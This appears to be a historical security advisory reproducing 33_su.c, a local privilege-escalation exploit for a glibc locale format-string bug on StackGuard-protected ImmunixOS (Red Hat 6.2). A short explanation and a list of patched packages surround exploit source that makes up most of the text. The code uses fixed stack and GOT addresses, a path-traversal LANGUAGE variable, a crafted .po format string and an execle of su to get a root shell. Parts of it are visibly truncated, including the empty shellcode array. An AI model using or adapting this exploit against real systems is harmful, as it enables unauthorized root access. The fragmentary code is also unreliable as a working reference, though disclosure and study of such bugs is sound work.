Mariusz Woloszyn found following.  He developed the first publicly
    known exploit  that bypases  StackGuard protection  in real world.
    He decided to publish it as the patch for glibc ImmunixOS is  out.
    It's also  the proof  of concept  described about  year ago in our
    (his and Bulba's) Phrack article published in May this year.

    The  exploit  is  as  simple  as  possible,  it  does not take any
    arguments  and  produces  shell  with  euid==0.  All addresses are
    fixed (stack and  env).  The  exploiting string overwrites  exit()
    GOT entry and makes it point to our shellcode (it's sufficient  if
    the  stack  is  executable)  just  like  we described it in phrack
    article long time ago.

    For complete story on glibc issue, take a look at following links:

    Let's  remind  that  by  using  StackGuarded binaries you're still
    adding  extra  security  level  that  can  be  bypassed ONLY under
    certain circumstances!

    /* 33_su.c exploit for LC glibc format string bug
       it works on StackGuarded version of RH 6.2
       called ImmunixOS (
       Exploit (c)Lam3rZ Group by Kil3r of Lam3rZ
       it's the first public sploit that bypases
       StackGuard protection in real world
       it is also a proof of concept described long time ago in Lam3rZ's Phrack
       article "BYPASSING STACKGUARD AND STACKSHIELD" by Bulba and Kil3r
       greetz: warning3, scut, stealth, bulba, tmoggie, nises, wasik (aka synek ;),
       and teso team, LSD team, HERT, padnieta babcia, z33d,
       lcamtuf aka postawflaszke,, Lucek Skajuoker (wracaj do
       Special greets go to Crispin Cowan
       Disclaimer: THIS is Lam3rZ style (famouce one). Lam3rz style DO NOT
       exploit bash, do not use bash and does nothing to do with bash scripts!
       Lam3rZ sploits do not like to take any arguments it confuses lamers!
       qwertz ?
       zes !
    // lamer:
    // compile it as a regular user on a box and it should work! :)
    // lam3r:
    // read the code carefully and have a fun! :)
    #include <stdio.h>
    #define EXIT_GOT      	0x804c624
    #define WHERESHELLCODE  0xbfffff81
    #define ENV             "LANGUAGE=fi_FI/../../../../../../tmp"
    #define PATH             "/tmp/LC_MESSAGES"
    char *env[11];
    char code[]=
    char hacker[]="\x24\xc6\x04\x08\x89\x89\x89\x89\x25\xc6\x04\x08\x89\x89\x89\x89\x26\xc6\x04\x08\x89\x89\x89\x89\x27\xc6\x04\x08\x44\x44\x44";
    main () {
    char buf[1024];
    FILE *fp;
    if(mkdir(PATH,0755) < 0)
    if( !(fp = fopen("libc.po", "w+")))
    fprintf(fp,"msgid \"%%s: invalid option -- %%c\\n\"\n");
    fprintf(fp,"msgstr \"%s\\n\"", buf);
    system("/usr/bin/msgfmt libc.po -o");
    printf("ZAJEBIŚCIE!!!\nA teraz będziesz leżał i tańczył rączką!\n");
    execle("/bin/su","su","-u", NULL,env);


    The  exploit  won't  work  if  glibc is patched (ImmunixOS patched
    glibc can be found at:
            - glibc-2.1.3-21_StackGuard.i386.rpm
            - glibc-devel-2.1.3-21_StackGuard.i386.rpm
            - glibc-profile-2.1.3-21_StackGuard.i386.rpm
            - nscd-2.1.3-21_StackGuard.i386.rpm).